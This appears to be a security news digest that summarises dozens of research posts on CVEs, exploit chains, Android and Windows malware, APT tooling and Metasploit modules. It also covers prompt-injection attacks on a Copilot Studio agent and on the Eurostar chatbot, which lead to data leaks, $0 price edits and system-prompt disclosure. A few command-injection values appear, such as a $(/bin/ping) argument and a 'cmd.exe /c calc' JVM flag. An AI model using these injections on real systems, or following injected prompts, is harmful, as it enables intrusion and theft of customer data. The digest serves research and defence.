The post shows how a Microsoft Copilot Studio travel agent, wired to a SharePoint reservations list, is abused via prompt injection. A crafted user prompt makes the agent reveal all its actions, then a multi-ID request causes the LLM to loop <code>get item</code> calls and leak multiple customers’ data, including credit cards. Overly broad <code>update item</code> rights let prompts set the trip price to $0. The article frames these as AI-agent business-logic flaws and gives concrete hardening and monitoring recommendations.

🌐 Web | 🛡️ CVE | 💣 RCE | 💰 Bug Bounty

🔗 Original article: https://patchstack.com/articles/privilege-escalation-vulnerability-in-soledad-theme-affecting-50k-sites/

The Soledad WordPress theme ≤ 8.6.9 has a critical privilege escalation (CVE-2025-64188). An AJAX handler, penci_update_option, lets any logged-in user with a nonce (visible to all /wp-admin users) call update_option() on arbitrary options without current_user_can() checks. A Subscriber can set users_can_register=1 and default_role=administrator, then register a new account that becomes an Administrator, leading to full site takeover (and typical RCE via plugins/themes). Version 8.6.9.1 adds a capability check to fix the issue and admins must update and audit options/users.

🛠️ Tool | 🌐 Web | 💰 Bug Bounty

🔗 Original article: https://blog.trailofbits.com/2025/12/11/introducing-mrva-a-terminal-first-approach-to-codeql-multi-repo-variant-analysis/

The post introduces mrva, a terminal-first tool for running GitHub CodeQL multi-repository variant analysis locally. It explains how to download pre-built CodeQL databases via GitHub’s API, run custom CodeQL queries or packs over hundreds/thousands of repos, and pretty-print SARIF findings in the terminal. It details useful codeql database analyze flags (--sarif-add-file-contents, --sarif-add-snippets, --no-group-results), how different query kinds map to SARIF (problem, path-problem, diagnostic, metric, graph), compares mrva with gh-mrva and vscode-codeql, and shows how to operationalize large-scale vulnerability research entirely offline.

🛰️ APT | 💣 RCE | 🌐 Web | 📦 Malware

🔗 Original article: https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/

Ashen Lepus (WIRTE) uses AshTag, a modular .NET espionage suite delivered via Arabic PDF lures and RAR archives. A fake document EXE DLL‑side‑loads AshenLoader, which fetches AshenStager and AshenOrchestrator from HTML‑embedded, AES‑encrypted blobs. Orchestrator decodes Base64+AES+XOR JSON configs and dynamically loads modules (recon, persistence, file management, screen capture) via class names like PR1, FE, SN. Persistence uses scheduled tasks executed by svchost.exe, while Rclone syncs staged documents from C:\Users\Public to attacker infrastructure over benign‑looking API/auth subdomains.

Android | RCE | Web | Malware

🔗 Original article: https://www.d3lab.net/inside-btmob-an-analytical-breakdown-of-a-leaked-android-rat-ecosystem/

The blog dissects a leaked toolkit for the BTMOB Android RAT, showing a full Android Studio source tree, a two-stage Accessibility-driven dropper, a semi-local builder tied to a server-side compilation pipeline, a Windows operator console (BTMob.exe), and a PHP/Node.js backend under /yaarsa/. It explains key commands (brows, screen, ject, wrk), the abuse of Accessibility and MediaProjection, overlay/WebView phishing, and centralized authentication that lets the threat actor control both operators and victims. It also enumerates concrete C2 fingerprints, URL paths, error signatures, and infrastructure traits that can be used as IOCs.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/

The blog details a design flaw in .NET’s HttpWebClientProtocol: it returns a scheme‑agnostic WebRequest, so SOAP proxies can be coerced to use file/UNC handlers via their Url. Through WSDL‑driven proxy generation (ServiceDescriptionImporter), attackers can set Url to file:// and shape SOAP bodies (via parameters, complex types, or namespaces) so requests become arbitrary file writes. This enables NTLM relaying and RCE by dropping ASPX/CSHTML webshells or scripts. The technique is weaponized against Barracuda RMM (CVE‑2025‑34392), Ivanti EPM (CVE‑2025‑13659), Umbraco 8, PowerShell, and SSIS.

🌐 Web | 🛡️ CVE | 💣 RCE | 🛠️ Tool

🔗 Original article: https://bountysecurity.ai/blogs/news/cve-2025-55182-react2shell-new-detection-profiles-for-burp-bounty-pro

The post explains CVE-2025-55182 (React2Shell), an unauthenticated RCE in React Server Components’ Flight protocol used by Next.js. Crafted multipart Flight data abuses prototype pollution (<code>$1:proto:then</code>) to reach <code>constructor.constructor</code> and <code>process.mainModule</code>, then runs <code>child_process.execSync()</code>, exfiltrating output via <code>NEXT_REDIRECT</code> and <code>x-action-redirect</code>. It details affected versions and introduces three Burp Bounty Pro profiles: a Unix math PoC, a Windows PowerShell PoC, and an OOB Collaborator-based check, plus scanning, WAF configuration, and remediation guidance.

📱 Mobile | 🌐 Web | 💣 RCE | 🛡️ MITRE ATT&CK

🔗 Original article: https://zimperium.com/blog/total-takeover-droidlock-hijacks-your-device

DroidLock is an Android ransomware-style malware delivered via phishing APKs. A dropper stage abuses Accessibility Services to auto-grant permissions for a second-stage payload, which then requests Device Admin rights, opens an HTTP+WebSocket C2, and exposes 15 commands. These allow full-screen ransomware/update overlays, lock/wipe via DevicePolicyManager, dynamic WebView credential overlays, lock-pattern theft, SMS/notification interception, screen recording (MediaProjection + VirtualDisplay), camera use, app uninstall, and VNC-like remote control. Impact is a complete remote takeover and persistent lockout of the victim device.

📱 Android | 🧠 Exploit | 💣 RCE | 🛡️ CVE

🔗 Original article: https://googleprojectzero.blogspot.com/2025/12/a-look-at-android-itw-dng-exploit.html

The post dissects an in-the-wild Android exploit that uses malicious DNG images disguised as WhatsApp JPEGs. When downloaded, WhatsApp stores them in MediaStore, where Samsung’s privileged com.samsung.ipservice parses them via the Quram library. Crafted SubIFDs, conflicting TIFF/DNG tags, and massive DNG Opcode Lists (e.g., thousands of opcode 23 entries) exploit a memory corruption bug in Quram, with allocator-specific variants for jemalloc and scudo. Successful exploitation yields RCE in com.samsung.ipservice, enabling spyware deployment. Samsung fixed the vulnerability in April 2025.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/publications/activid-administrator-account-takeover-the-story-behind-hid-psa-2025-002.html

The post analyzes HID ActivID Appliance 8.5 and finds HID‑PSA‑2025‑002: an authentication bypass in its JAX‑WS SOAP API. A LoginHandler stores a JAAS Subject (built from a user’s ALSI session token) in a static ThreadLocal without resetting it per request and does nothing when no auth header is present. Because WebLogic reuses threads, unauthenticated SOAP calls to /ac-iasp-backend-jaxws/* can inherit a previous administrator’s Subject and execute EJB methods with admin rights. The article explains the full nginx/WebLogic/EAR/WAR layout, decompilation, CodeQL use, JDWP debugging, and SOAP tooling.

🛡️ CVE | 🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-12-2025

This Metasploit wrap-up introduces exploit modules for React2Shell (CVE-2025-55182), Magento SessionReaper (CVE-2025-54236), and WordPress King Addons (CVE-2025-8489), all enabling unauthenticated RCE chains. It adds an SMB-to-MSSQL NTLM relay server with TLS-capable MSSQL sessions, a LoongArch64 Linux reboot payload, and broader FortiWeb 6.* RCE support. SSH public-key scanning is merged into the main ssh_login module. Together, these updates expand offensive coverage against modern web apps and enterprise MSSQL deployments.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2025/12/13/htb-whiterabbit.html

The post chains multiple weaknesses to fully compromise HTB’s WhiteRabbit: WebSocket tampering on Uptime Kuma to discover an internal WikiJS; Wiki docs leaking an n8n webhook HMAC secret and an unsafe MySQL node; forging signed webhook requests and exploiting SQL injection via a debug respondToWebhook node, automated with mitmproxy and sqlmap; dumping DB logs to recover restic repo credentials; using restic to pull a 7z-encrypted SSH key backup, cracking it with hashcat, and pivoting into a container as bob; abusing sudo restic --password-command for container root; stealing a host SSH key for morpheus; and reconstructing neo’s password from a time-seeded C password generator using the logged timestamp to finally gain root.

🦠 Malware | 🌐 Web | 🛡️ ThreatIntel | 💣 RCE

🔗 Original article: https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums

SantaStealer is a Windows infostealer-as-a-service with modular, multi-threaded data theft and cleartext HTTP exfiltration. It embeds a Chromium AppBound Encryption bypass based on the ChromElevator project, using a ChaCha20-encrypted DLL and reflective process hollowing to hijack live browsers and decrypt credentials. Modules run in parallel, collect environment data, documents, messengers, and browser artifacts into Log.zip, split it into 10 MB chunks, and upload via /upload on TCP 6767 with custom headers. Anti-VM checks (process blacklists, VBoxGuest, timing) are basic; unstripped symbols and plaintext config make detection and hunting straightforward.

📡 IoT | 💣 RCE | 🛡️ CVE | 🌐 Web

🔗 Original article: https://www.nccgroup.com/research-blog/technical-advisory-sercomm-h500s-authenticated-remote-command-execution-cve-2021-44080/

CVE-2021-44080 is an authenticated command injection in SerComm h500s routers (firmware lowi-h500s-v3.4.22). The mini_httpd-served setup.cgi diagnostic endpoint /data/statussupport_diagnostic_tracing.json uses the connection_type parameter in a shell command without sanitization. An authenticated privileged attacker can send connection_type=br0$(/bin/ping …) with run_tracing=1, leading to root-level RCE. The CVSS v3 score is 6.6 (Medium). Updating firmware, usually via the ISP, is required. A PoC video is published on asciinema.

🌐 Web | 🛡️ Privacy | 💰 Bug Bounty | 🎁 PoC

🔗 Original article: https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/

The blog dissects Freedom Chat’s backend APIs and shows how two design flaws leak users’ phone numbers and PINs. A channels API returns every channel member’s 6‑digit PIN in plaintext, and a contact discovery API accepts huge batches of phone numbers without rate limiting, returning <uid, phoneNumber, sealdKey> for all existing accounts. A Python PoC brute‑forces NANP numbers through /user/numbers and, by joining results with /channel responses on uid, yields a global phoneNumber → PIN mapping.

🛡️ CVE | 🛠️ Tool | 🌐 Web | 💣 RCE

🔗 Original article: https://www.nccgroup.com/research-blog/implementing-the-castryck-decru-sidh-key-recovery-attack-in-sagemath/

The post describes a full SageMath reimplementation of the Castryck–Decru key-recovery attack on SIDH/SIKE. It explains how public torsion images, fixed-degree secret isogenies, and a known endomorphism ring enable a Glue-and-Split oracle on genus‑2 Jacobians using Richelot isogenies to recover Bob’s base‑3 secret digit by digit. It also details major algorithmic and implementation optimizations (Gröbner-free lifting, finite-field caching, Jacobian and isogeny speedups) that make the attack faster than the original Magma PoC, recovering all SIKE private keys, including SIKEp751, in practical time on a laptop.

🌐 Web | 🛠️ Tool | 💣 RCE

🔗 Original article: https://www.nccgroup.com/research-blog/impact-of-dns-over-https-doh-on-dns-rebinding-attacks/

The blog shows that DNS over HTTPS (DoH) does not mitigate DNS rebinding. Using Singularity of Origin, all strategies (“first then second”, multiple answers, cache flooding) still work against major DoH providers (Cloudflare, Google, OpenDNS). Claimed DoH rebinding protections (e.g. NextDNS, OpenDNS/Umbrella) are bypassed via 0.0.0.0 loopback usage and CNAME indirection combined with Firefox’s DoH fallback. Defenders must harden local/internal services; DNS/DoH filtering alone cannot stop rebinding that can expose data or reach RCE‑prone services.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://i0.rs/blog/a-deep-and-very-technical-analysis-of-cve-2025-55182-react2-shell/

The blog deeply analyzes CVE‑2025‑55182 (React2Shell), a CVSS 10 RCE in React Server Components’ Flight protocol. It explains React/Next.js architecture, RSC and Flight internals, then shows how crafted multipart Flight chunks, parsed by parseModelString, can traverse prototype chains via $chunkId:__proto__:constructor:constructor and related references. With a local Next.js+React 19 debug setup and a public PoC, the author demonstrates how unsafe deserialization lets attackers reach Function and Node primitives (e.g. child_process.execSync), yielding unauthenticated server‑side code execution.

⛓️ Web3 | 🛡️ CVE | 🌐 Web

🔗 Original article: https://www.nccgroup.com/research-blog/public-report-threshold-ecdsa-cryptography-review/

NCC Group announces a public report on its cryptographic review of DFINITY’s Rust-based threshold ECDSA implementation for the Internet Computer. The post briefly describes the goal (secure cross-chain ECDSA signing for canisters), mentions that a manual code review plus retest was done in early 2022, and links to both the academic tECDSA design paper and the full NCC PDF report. The blog itself contains no concrete vulnerabilities, code, or exploit details—those are only in the linked report.

🌐 Web | 🛡️ CVE | 💣 RCE | 💰 Bug Bounty

🔗 Original article: https://www.nccgroup.com/research-blog/an-offensive-guide-to-the-authorization-code-grant/

The post is a practical offensive guide to OAuth 2.0 Authorization Code flows. It explains how the flow should work, then details how to exploit weak state (CSRF/account linking), poor code lifetime/reuse controls, broken redirect_uri validation (poisoned redirects, XSS/open redirects, IDN tricks), misuse of client_secret in native apps, access token leaks to the front end, and missing clickjacking protections on OAuth consent pages, with references and a clickjacking PoC tool.

🛠️ Tool | 🌐 Web | 📡 IoT

🔗 Original article: https://github.com/blacktop/ipsw

ipsw is a Go-based iOS/macOS research framework and CLI that automates downloading and unpacking IPSW/OTA firmware, extracting DMGs, kernelcaches, and dyld shared caches, and parsing Mach-O binaries and metadata. It also wraps USBMUX/lockdown/AFC to interact with real devices, and exposes its features via Docker and an HTTP API, greatly streamlining Apple firmware triage and vulnerability research.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/publications/exploiting-anno-1404.html

The post describes a full RCE chain in Anno 1404: Venice (GOG v2.01.5010). A path traversal in the multiplayer save transfer lets a malicious host write arbitrary files by embedding ..\ in the save filename. Using this, the attacker injects malicious GR2 models via RDA archives. A bug in granny2.dll’s relocation handler (GrannyGRNFixUp_0) with unchecked SectionNumber/SectionOffset, combined with controlled NT heap layout (n=2720 sections, >0x4000 bytes), yields an arbitrary write that overwrites Granny allocator callbacks, resulting in in‑session remote code execution.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/

The blog dissects Ink Dragon’s full attack chain: ASP.NET ViewState and ToolShell (CVE‑2025‑49704/49706/53770/53771) for web RCE, local SYSTEM escalation, LSASS dumping (LalsDumper SSP), RDP session/token abuse for domain dominance, and aggressive lateral movement. A ShadowPad IIS Listener builds a cross‑victim relay mesh while acting as a full backdoor. Multiple loaders (signed DLL‑sideloading triads, CDBLoader, 032Loader) and an updated FinalDraft RAT use Microsoft Graph/Outlook drafts, flexible beaconing, host profiling, security‑control downgrades, and high‑throughput exfiltration.

💣 RCE | 🛡️ Exploit | 🪟 Windows | 🎁 PoC

🔗 Original article: https://projectzero.google/2025/12/windows-exploitation-techniques.html

The post explains a reusable Windows exploitation trick: slow down Object Manager Namespace lookups to enlarge race-condition windows. By either using a near-32k-character object name or a ~16k-level directory chain under writable namespaces like \BaseNamedObjects, NtOpen* calls slow from ~2µs to tens of microseconds. This significantly improves reliability of check→lookup→secure-action races. The article includes C++ code to generate long names and deep directory trees and to benchmark lookup times with NtOpenEvent, forming a practical PoC primitive.

VM Escape | CVE | RCE | PoC

🔗 Original article: https://projectzero.google/2025/12/thinking-outside-the-box.html

The post details CVE-2017-3558 in VirtualBox’s Slirp NAT: ip_input() overwrites a trusted mbuf length with a guest-controlled IP total length, breaking bounds checks. Carefully crafted UDP packets with checksum 0 produce reliable heap infoleaks, while IP options handling in ip_stripoptions() copies data across mbuf boundaries, corrupting inline struct item headers and redirecting their zone pointer to a forged struct uma_zone. Through slirp_uma_free(), this becomes an arbitrary memcpy() call, enabling arbitrary writes in the non-PIE VirtualBox host process and a final system() call for a full VM escape.

CVE | RCE | Windows | ExploitDev

🔗 Original article: https://projectzero.google/2025/05/the-windows-registry-adventure-8-exploitation.html

The post analyzes how deterministic registry hive allocation, misconfigured writable HKLM/HKU keys, and cross-user-writable HKCU\Software\Microsoft\Input\TypingInsights enable exploitation of hive memory corruption CVEs (notably CVE-2023-23420 and CVE-2023-23423) for local privilege escalation on Windows 11. By corrupting metadata for large registry values (big data), the attacker turns hive corruption into a linear paged pool overflow (via an inconsistency between _CM_KEY_VALUE.DataLength and _CM_BIG_DATA.Count) and further shows that tightly packed hive mappings in the Registry process let linear overflows from an attacker-controlled hive corrupt privileged HKLM hives, ultimately yielding arbitrary kernel read/write and SYSTEM-level compromise.

🐧 Linux Kernel | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://projectzero.google/2025/08/from-chrome-renderer-code-exec-to-kernel.html

CVE‑2025‑38236 is a Linux kernel UAF in AF_UNIX <code>MSG_OOB</code> handling for stream sockets, reachable from Chrome’s renderer sandbox. A logic bug in <code>manage_oob()</code> allows an OOB SKB to be freed while still referenced by <code>u->oob_skb</code>, yielding a dangling SKB pointer. The blog shows how to convert this into a 1‑byte arbitrary kernel read, then into a +4GiB stack length increment in <code>copy_page_from_iter()</code>, causing an OOB write into an adjacent page table page and full kernel compromise.

🛡️ CVE | 🌐 Web | 💣 RCE | 🎁 PoC

🔗 Original article: https://projectzero.google/2025/09/pointer-leaks-through-pointer-keyed.html

The blog describes a novel pointer-leak technique on Apple platforms exploiting how NSDictionary hashes and serializes keys. By crafting dictionaries with controlled NSNumber keys and a singleton NSNull key (whose CFHash is its pointer) and arranging even/odd bucket patterns, the attacker learns hash_code % p for several prime table sizes. Using the Chinese Remainder Theorem across primes {23,…,1087}, they reconstruct the full 64‑bit address of CFNull in the shared cache from a single deserialize → re‑serialize cycle, with a complete macOS PoC pipeline and discussion of mitigations against pointer-based hashing leaks.

🛡️ CVE | 💣 RCE | 🌐 Web | 💰 Bug Bounty

🔗 Original article: https://projectzero.google/2025/05/the-windows-registry-adventure-7-attack-surface.html

The post dissects the Windows Registry as a local kernel attack surface, explaining how hive design, manual reference counting, aggressive self-healing, weak regf invariants, and fragile OOM/partial-success handling led to dozens of CVEs. It shows how attackers can craft hives and exhaust per-hive/global registry quotas to create kernel UAFs and logic bugs, especially when combined with complex features like virtualization, transactions, layered keys, and predefined/symlinked keys.

Android | CVE | RCE | PoC

🔗 Original article: https://projectzero.google/2025/12/android-itw-dng.html

A campaign targets Samsung Android devices by sending malicious DNG images (disguised as JPEGs) over WhatsApp. When downloaded, WhatsApp stores them in MediaStore, where the Samsung system service com.samsung.ipservice parses them with the Quram library. Huge, specially crafted DNG opcode lists (notably opcode 23 plus TrimBounds/DeltaPerColumn) exploit missing bounds checks to create a controlled heap overflow. Allocator-aware heap grooming under jemalloc and Scudo places vulnerable image buffers next to C++ objects or function-pointer-bearing structures, allowing vtable/function pointer corruption and RCE via a payload embedded in DNG metadata. The bug was patched by Samsung around April 2025.

🛡️ KASLR | 🐧 Kernel | 📱 Android | 💣 RCE

🔗 Original article: https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.html

The post explains how arm64 Linux’s fixed linear map and Pixel’s static kernel physical base effectively defeat KASLR for kernel data. With PAGE_OFFSET = 0xffffff8000000000 and PHYS_OFFSET = 0x80000000, phys_to_virt becomes a static mapping, and Pixel always loads the kernel at 0x80010000. This lets attackers compute stable linear‑map virtual addresses for .data (e.g. modprobe_path) or use PFN spraying plus /proc/pagemap on other devices to place user data at known kernel virtual addresses, greatly simplifying data‑centric kernel exploits.

💣 Ransomware | 📡 ESXi | 🧠 Reverse Engineering | 🛠️ Tool

🔗 Original article: https://unit42.paloaltonetworks.com/ransomhouse-encryption-upgrade/

The post reverse engineers RansomHouse’s ESXi-focused toolchain: MrAgent, a C2-controlled ESXi management/deployment agent, and Mario, a VM/backup encryptor. It explains Mario’s evolution from a simple linear, single-key scheme to a two-key, multi-stage, dynamically chunked and sparse encryption routine, detailing stack layouts, buffers, targeted virtualization/backup extensions, ransom note behavior and IoCs. It also documents specific ESXi commands, C2 instructions and detection points that defenders can monitor to identify and mitigate RansomHouse operations.

📱 Android | 💣 RCE | 🌐 Web | 🛡️ Malware

🔗 Original article: https://securelist.com/frogblight-banker/118440/

The post details Frogblight, a new Android banking Trojan targeting mainly Turkish users via smishing and phishing sites impersonating government portals. Disguised as court, Chrome, or social support apps, it abuses WebView injections, a custom keyboard, and powerful REST/WebSocket C2 APIs to steal banking credentials, SMS, contacts, call logs, files, and keystrokes, while maintaining robust persistence, geofencing, and sandbox evasion. A key‑based web panel and shared GitHub infrastructure with Coper indicate a MaaS model. Extensive IoCs and protocol descriptions support detection and analysis.

🌐 Web | 💣 RCE | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing/

The post dissects GachiLoader, a heavily obfuscated Node.js loader distributed via compromised YouTube accounts, and its second-stage loader Kidkadi, which implements a novel PE injection technique called Vectored Overloading. It details anti-analysis checks, UAC-based elevation, Defender tampering, C2 gating with secret headers, and two payload-delivery variants. Kidkadi uses Vectored Overloading to abuse VEHs and hardware breakpoints on NtOpenSection/NtMapViewOfSection so LoadLibrary maps a malicious PE backed by wmp.dll instead of amsi.dll. The article also introduces Nodejs-Tracer and a public VectoredOverloading PoC for defenders.

⛓️ Web3 | 🌐 Web

🔗 Original article: https://bishopfox.com/blog/mitre-aadapt-framework-as-a-red-team-roadmap

The post shows how to turn MITRE’s AADAPT framework for digital‑asset attacks into concrete, measurable red‑team scenarios. It guides you to map value‑bearing components to AADAPT tactics, prioritize operational and value‑specific weaknesses, run safe tests in forked/testnet environments with proper rollback, and instrument chain, app, KMS, oracle, and bridge telemetry. A purple‑team loop then turns flash‑loan, oracle‑poisoning, signing‑abuse, and cross‑chain‑evasion simulations into improved detection, containment, and governance.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/

CVE-2025-64374 is a critical (CVSS 9.9) arbitrary plugin/file upload flaw in the Motors WordPress theme ≤5.6.81. An authenticated AJAX handler, mvl_theme_install_base, lets any Subscriber+ supply a remote plugin ZIP URL via $_GET['plugin']. The code installs and activates that plugin using WordPress’ Plugin_Upgrader, without current_user_can() checks, enabling malicious PHP plugins and full site takeover. Version 5.6.82 fixes this by adding capability checks and reiterates that nonces (check_ajax_referer) are for CSRF only, not authorization.

📡 IoT | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://blog.xlab.qianxin.com/kimwolf-botnet-en/

Kimwolf is a million-plus-node Android TV/box botnet tied to Aisuru, deployed via malicious APKs that drop and run statically linked ARM ELFs as root. The bot enforces single instance via a Unix socket, hides as <code>netd_services</code>/<code>tv_helper</code>, decrypts C2s with stack-based XOR (ARM NEON), and resolves them through DNS-over-TLS plus XOR-IP obfuscation or ENS/EtherHiding. A TLS+ECDSA-authenticated protocol exposes proxying, reverse shell, file ops, and Mirai-style DDoS. Rust proxy clients and a ByteConnect SDK monetize bandwidth. The article provides full protocol structs, decryption scripts, a CyberChef recipe, and rich IoCs.

🛡️ CVE | 🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025

This Metasploit wrap-up introduces a chained N-able N-Central auth-bypass+XXE scanner (CVE-2025-9316, CVE-2025-11700) for unauthenticated file read and a Grav CMS Twig SSTI + broken access control exploit (CVE-2025-66294, CVE-2025-66301) for authenticated RCE. It also improves default payload selection (x86 Meterpreter on Windows, x64 elsewhere) and switches React2Shell to a Node.js-based default payload, plus richer vulnerability/service reporting via new resource and parents fields.

🛡️ CVE | 💣 RCE | 📡 IoT | 🎁 PoC

🔗 Original article: https://github.com/farazsth98/poc-CVE-2025-38352

GitHub repo providing a buildable 🎁 PoC for CVE-2025-38352, a race-condition bug in Linux POSIX CPU timers (handle_posix_cpu_timers) affecting kernels with CONFIG_POSIX_CPU_TIMERS_TASK_WORK disabled. It includes poc.c, a Makefile for LTS 6.12.33, and mdelay_patch.diff adding a 500 ms delay to widen the race window. Exploitation can lead to kernel memory corruption and local privilege escalation, notably on Android.

🌐 Web | 💉 XSS | 💣 RCE | 🛡️ CVE

🔗 Original article: https://www.pentestpartners.com/security-blog/eurostar-ai-vulnerability-when-a-chatbot-goes-off-the-rails/

The post reverse-engineers Eurostar’s LLM-backed chatbot API and shows that only the latest message is guard-signed, allowing attackers to edit earlier messages and inject system-level prompts. This enables prompt injection to reveal the underlying model and system prompt, and to coerce the LLM into outputting arbitrary HTML/JS, which the frontend renders unsanitised, causing self-XSS with a likely path to stored/shared XSS due to unvalidated conversation/message IDs. The article provides concrete JSON request/response examples, an HTML/JS payload, and detailed defensive guidance.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/

Deep dive into Linux kernel CVE-2025-38352, a race-condition UAF in POSIX CPU timers. The post explains how handle_posix_cpu_timers() can process timers for a zombie task while a parent reaps the thread and calls timer_delete(), freeing a still-referenced struct k_itimer. A full PoC uses per-thread CPU timers, ptrace-controlled zombie reaping, IPC, CPU pinning, and an optional kernel patch to reliably trigger a KASAN-detected UAF, with discussion of why it mainly affects 32‑bit Android kernels lacking CONFIG_POSIX_CPU_TIMERS_TASK_WORK.

🌐 Web | 🛡️ CVE | 💣 RCE | 🛠️ Tool

🔗 Original article: https://www.elttam.com/blog/leaking-more-than-you-joined-for/

The post analyzes a broad class of ORM Leak bugs across Beego/Harbor (CVE-2025-30086), Prisma, Entity Framework, and OData. It shows how unsafe mapping of user filters into ORM expressions, broken Beego parsing, and Prisma operator injection via type confusion let attackers search or compare on sensitive fields (passwords, salts, tokens, TOTP secrets) and even bypass authentication. It also explains the impact of database collation, provides Semgrep rules for detection, and offers concrete defensive patterns for safely implementing filtering/search.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://amlalabs.com/blog/oauth-cve-2025-6514/

The post explains CVE-2025-6514, an OS command injection in mcp-remote where a malicious MCP server can return a crafted OAuth authorization_endpoint (e.g., file:/c:/windows/system32/calc.exe) that mcp-remote blindly opens, causing RCE on the client host. It analyzes why OAuth’s discovery model is unsafe for autonomous agents and advocates a capability-based delegation model where agents hold cryptographic capability tokens instead of raw credentials or server-controlled auth URLs, removing this entire discovery-based attack surface.

🌐 Web | 💉 XSS | 🌐 SSRF | 🛡️ CVE

🔗 Original article: https://security.lauritz-holtmann.de/post/xss-ssrf-list-unsubscribe/

The post shows how the RFC 2369 List-Unsubscribe header can be abused in modern mail clients. In Horde Webmail (CVE-2025-68673), a javascript: URI in List-Unsubscribe is rendered directly into an <a href> and executed when opened in a new tab, yielding stored XSS. In Nextcloud Mail, server-side processing of List-Unsubscribe can create blind SSRF, demonstrated via a DKIM-signed email pointing to a collaborator URL and relying on configuration such as allow_local_remote_servers => true.

🌐 Web | 💣 RCE | 🛡️ CVE | 🛠️ Tool

🔗 Original article: https://www.synacktiv.com/publications/livewire-execution-de-commandes-a-distance-via-unmarshaling.html

The blog dissects Laravel Livewire 3’s hydration system and shows two RCE paths: one design flaw where a known APP_KEY lets attackers forge snapshots, abuse synthesizers (clctn, form, mdl) and Laravel deserialization gadgets (phpggc Laravel/RCE4Adapted) for stealthy RCE; and CVE-2025-54068, which abuses the updates mechanism, weakly typed public properties and recursive hydration to inject arbitrary synthesizers and the same gadget chain without APP_KEY. Tools laravel-crypto-killer and Livepyre provide automated PoC exploitation.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://elliott.diy/blog/curseforge/

The post describes a browser-to-local RCE in the CurseForge desktop launcher. A local WebSocket server in CurseAgent.exe listened on a random localhost port, exposed methods like createModpack and minecraftTaskLaunchInstance, and performed no Origin checks. A malicious website can WebSocket-scan ~16k local ports, connect, create a modpack, then launch it with JVM flags -XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c calc" to execute arbitrary commands. A full PoC (video, live demo, source) is provided. CurseForge fixed it in version 1.289.3 by adding Origin validation/removing the WS server.

📱 Mobile | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://media.ccc.de/v/39c3-dngerouslink-a-deep-dive-into-whatsapp-0-click-exploits-on-ios-and-samsung-devices

The talk deconstructs an in-the-wild 0‑click spyware chain against WhatsApp on Apple and Samsung devices. A WhatsApp linked‑device logic bug (CVE‑2025‑55177) lets attackers send crafted protocol messages that silently load attacker web content, which embeds a malicious DNG image exploiting an iOS/macOS RawCamera OOB bug (CVE‑2025‑43300). The researchers rebuild the chain and ship a crashing PoC across iPhones, iPads, and Macs. They then analyze Samsung’s image parser OOB write (CVE‑2025‑21043) and related 0‑days, showing how auto‑parsed images plus messaging‑layer flaws yield powerful 0‑click RCE paths.

🛡️ Kerberos | 💣 RCE | 🖥️ Active Directory | 💰 Bug Bounty

🔗 Original article: https://blog.cryptographyengineering.com/2025/09/10/kerberoasting/

The post explains Kerberoasting in Active Directory: any domain user can request Kerberos service tickets encrypted under Service account keys. If those accounts use human passwords and especially if Kerberos falls back to legacy RC4 + NT hash encryption, attackers can export tickets and perform extremely fast offline cracking (billions of guesses/sec on GPUs) to recover high‑privilege Service passwords and pivot to ransomware. Mitigations: random keys for services, very strong passwords where unavoidable, and disabling RC4/legacy encryption types.

🌐 Web | 🛡️ CVE

🔗 Original article: https://words.filippo.io/last-resort/

The post outlines how Geomys became maintainer of last resort for the bluemonday HTML sanitizer and responded to critical CSRF flaws in gorilla/csrf, including a schemeless same-site bug (CVE-2025-24358) and a TrustedOrigins-related issue exploitable by network attackers. Since gorilla/csrf appears unmaintained, Geomys introduced modern Fetch-Metadata–based CSRF defenses via Go’s net/http.CrossOriginProtection (Go 1.25), a backport module (filippo.io/csrf), and a gorilla-compatible drop-in (filippo.io/csrf/gorilla), recommending migration and HSTS with includeSubDomains.

🌐 Web | 🛡️ Crypto | 💣 RCE | 💰 Bug Bounty

🔗 Original article: https://blog.cryptographyengineering.com/2025/06/09/a-bit-more-on-twitter-xs-new-encrypted-messaging/

The post explains how XChat’s “encrypted” messaging uses Juicebox to protect server-stored private keys, but in a centralized, likely software-only deployment controlled entirely by X. It details Juicebox’s t-OPRF, threshold realms, per-account tags, and counters, plus attacks like subset amplification, tag replay via cloned realm IDs, and DoS via counter exhaustion. Because X stores long-term decryption keys and has no forward secrecy, a malicious or compelled X can feasibly recover user keys and decrypt all XChat messages.

🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://cryptologie.net/posts/weaponizing-ai-assistants-with-their-permission/

